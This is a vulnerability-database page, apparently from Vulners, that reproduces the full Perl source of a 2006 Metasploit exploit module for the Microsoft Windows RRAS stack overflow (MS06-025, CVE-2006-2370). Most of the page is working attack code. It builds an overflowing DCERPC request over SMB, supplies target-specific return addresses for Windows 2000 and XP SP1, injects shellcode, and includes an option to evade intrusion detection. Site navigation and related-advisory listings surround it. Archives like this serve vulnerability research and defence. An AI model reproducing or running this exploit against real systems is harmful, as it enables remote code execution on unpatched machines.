Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)

🗓️ 22 Jun 2006 00:00:00Reported by H D MooreType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 152 Views

Microsoft Windows RRAS Remote Stack Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)
22 Jun 200600:00
zdt
0day.today		MS Windows RRAS RASMAN Registry Stack Overflow Expl (MS06-025)
29 Jun 200600:00
zdt
Circl		CVE-2006-2370
9 May 201000:00
circl
Check Point Advisories		Microsoft Windows RRAS Memory Corruption (CVE-2006-2370)
18 Aug 201000:00
checkpoint_advisories
CVE		CVE-2006-2370
13 Jun 200619:00
cve
Cvelist		CVE-2006-2370
13 Jun 200619:00
cvelist
Exploit DB		Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)
9 May 201000:00
exploitdb
Exploit DB		Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)
25 Aug 201000:00
exploitdb
Exploit DB		Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)
29 Jun 200600:00
exploitdb
exploitpack		Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)
22 Jun 200600:00
exploitpack
Rows per page
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' => 
	[ 
		'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
		'H D Moore <hdm [at] metasploit.com>'
	],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2000', 'winxp' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'UserOpts' => {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
	  },

	'Payload' => {
		'Space'    => 1104,
		'BadChars' => "\x00",
		'Keys'     => ['+ws2ord'],

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
        This module exploits a stack overflow in the Windows Routing and Remote
		Access Service. Since the service is hosted inside svchost.exe, a failed 
		exploit attempt can cause other system services to fail as well. A valid
		username and password is required to exploit this flaw on Windows 2000. 
		When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
}
	  ),

	'Refs' =>
	  [
		[ 'BID', '18325' ],
		[ 'CVE', '2006-2370' ],
		[ 'OSVDB', '26437' ],
		[ 'MSB', 'MS06-025' ]
	  ],

	'DefaultTarget' => 0,
	'Targets'       =>
	  [
		[ 'Automatic' ],
		[ 'Windows 2000',   0x7571c1e4 ], # pop/pop/ret
		[ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret
	  ],

	'Keys' => ['rras'],

	'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
	my ($class) = @_;
	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	my ( $res, $rpc );

	if ( !$self->InitNops(128) ) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
	my $version = '1.0';

	my $handle =
	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
		$pipe );

	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $self->GetVar('FragSize'),
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if ( $target->[0] =~ /Auto/ ) {
		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
			$target = $self->Targets->[1];
			$self->PrintLine('[*] Detected a Windows 2000 target...');
		}
		elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
			$target = $self->Targets->[2];
			$self->PrintLine('[*] Detected a Windows XP target...');
		}
		else {
			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
			return;
		}
	}

	my $pattern = '';

	if ($target->[0] =~ /Windows 2000/) {

		$pattern =
		  pack( 'V', 1 ) .
		  pack( 'V', 0x49 ) .
		  $shellcode .
		  "\xeb\x06" .
		  Pex::Text::AlphaNumText(2).
		  pack( 'V', $target->[1] ) .
		  "\xe9\xb7\xfb\xff\xff" ;

	} elsif( $target->[0] =~ /Windows XP/) {

		$pattern =
		  pack( 'V', 1 ) .
		  pack( 'V', 0x49 ) .
		  Pex::Text::AlphaNumText(0x4c).
		  "\xeb\x06" .
		  Pex::Text::AlphaNumText(2).
		  pack( 'V', $target->[1] ) .
		  $shellcode;

	} else {
		self->PrintLine( '[*] No target available...');
		return;
	}

	# need to produce an exception
	my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern));

	my $len = length ($request);

	my $stub =
	  Pex::NDR::Long( int( 0x20000 ) )
	  . Pex::NDR::Long( int( $len ) )
	  . $request
	  . Pex::NDR::Long( int( $len ) );

	$self->PrintLine("[*] Sending request...");
	my @response = $dce->request( $handle, 0x0C, $stub );
	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
		$self->PrintLine('[*] This probably means that the system is patched');
	}
	return;
}

1;

# milw0rm.com [2006-06-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jun 2006 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 27.5
EPSS0.85468
microsoft windows rrasremote stack overflowms06-025metasploitdcerpcndrsmbsvchost.exestack overflowwindows 2000windows xp sp1bidcveosvdbms06-025usernamepasswordsvchost.exexp sp1smbpipeexploitpop/pop/retdisclosuredate'ncacn_np'fragsizebindevasiondirectsmb
152